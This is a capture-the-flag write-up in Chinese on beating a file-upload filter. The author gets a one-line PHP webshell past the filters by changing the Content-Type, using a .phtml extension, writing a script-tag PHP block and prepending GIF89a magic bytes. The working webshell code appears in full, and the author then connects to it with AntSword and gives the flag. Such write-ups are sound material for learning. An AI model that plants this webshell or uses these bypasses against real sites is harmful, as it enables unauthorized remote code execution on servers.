0x01  题目

0x02  解题过程

尝试把一句话木马原封不动上传,提示需要image。

 

 那行,咱继续尝试各种文件上传姿势。首先改Content-Type为image/jpeg。

 

 

 

 看来后缀名不能为php,那么再改各种后缀名试试,例如,php3,php4,php5,phtml,phar。我改成phtml。

 

 

 看来不能含有'<?', 那么我们就需要把php换一种格式了,看下图:

 

 还是不行,叫我别骗他了窝。那行,那我再骗一波,加上gif的文件幻数,在PHP代码前加上GIF89a:

 

GIF89a
<script language="php">
@eval($_POST['hacker']);
</script>

 

 

 

 搞定,但没有显示文件路径,猜测在upload目录下,于是尝试访问:

 

 

 只看到GIF89a,但看不到脚本代码,一般是成功了,用蚁剑尝试连接:

 

 连上了以后直接在根目录下找到flag,完成。

flag{2e58d7d7-b6c2-44a2-9890-aae4edfdbcfc}

 

最后,欢迎师傅们指正和讨论~

内容来源于网络如有侵权请私信删除